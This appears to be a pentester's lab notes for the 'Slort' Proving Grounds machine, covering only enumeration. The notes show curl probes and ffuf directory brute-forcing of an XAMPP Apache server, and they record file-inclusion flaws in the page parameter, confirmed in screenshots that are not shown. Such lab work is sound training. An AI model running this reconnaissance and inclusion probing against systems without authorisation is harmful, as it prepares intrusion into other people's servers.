Web
Nmap discovered a Web server on the target port 4443
The running service is Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ curl -i http://$IP:4443/
HTTP/1.1 302 Found
Date: Fri, 07 Feb 2025 18:34:00 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
X-Powered-By: PHP/7.4.6
Location: http://192.168.134.53:4443/dashboard/
Content-Length: 0
Content-Type: text/html; charset=UTF-8302 to http://192.168.134.53:4443/dashboard/
/Practice/Slort/2-Enumeration/attachments/{FF9C8ED0-0887-4958-96A4-974204BF34DD}.png)
It’s the default installation of XAMPP Apache
The web server appears identical to the web server on the target port 8080
Fuzzing
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP:4443/FUZZ -ic
________________________________________________
:: Method : GET
:: URL : http://192.168.134.53:4443/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htaccess [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 102ms]
.htpasswd [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 173ms]
aux [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 38ms]
cgi-bin/ [Status: 403, Size: 1060, Words: 103, Lines: 43, Duration: 37ms]
com3 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 26ms]
com2 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 27ms]
com4 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 23ms]
com1 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 138ms]
con [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 50ms]
dashboard [Status: 301, Size: 351, Words: 22, Lines: 10, Duration: 24ms]
favicon.ico [Status: 200, Size: 30894, Words: 412, Lines: 6, Duration: 27ms]
img [Status: 301, Size: 345, Words: 22, Lines: 10, Duration: 26ms]
licenses [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 117ms]
lpt1 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 76ms]
lpt2 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 89ms]
nul [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 67ms]
phpmyadmin [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 125ms]
prn [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 48ms]
server-info [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 39ms]
server-status [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 39ms]
site [Status: 301, Size: 346, Words: 22, Lines: 10, Duration: 20ms]
webalizer [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 83ms]
xampp [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 23ms]
:: Progress: [20478/20478] :: Job [1/1] :: 232 req/sec :: Duration: [0:00:53] :: Errors: 0 ::/site/
/site/
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ curl -I http://$IP:4443/site/
HTTP/1.1 301 Moved Permanently
Date: Fri, 07 Feb 2025 21:26:57 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
X-Powered-By: PHP/7.4.6
Location: index.php?page=main.php
Content-Type: text/html; charset=UTF-8/Practice/Slort/2-Enumeration/attachments/{B339B229-4734-4337-BEEB-BF6DC4C6E835}.png)
301 to the /site/index.php?page=main.php
/Practice/Slort/2-Enumeration/attachments/{9FCA4719-B98D-4059-BF53-16A79681ADE2}.png)
There appears to be an inclusion at the page parameter of the index.php file
LFI
/Practice/Slort/2-Enumeration/attachments/{2844F751-C785-45A8-ADAA-F900192C1947}.png)
LFI confirmed
RFI
/Practice/Slort/2-Enumeration/attachments/{6979A939-E180-484D-8C0C-61DA3DA819D0}.png)
/Practice/Slort/2-Enumeration/attachments/Pasted-image-20250207225638.png)
RFI confirmed
Moving on to the Exploitation phase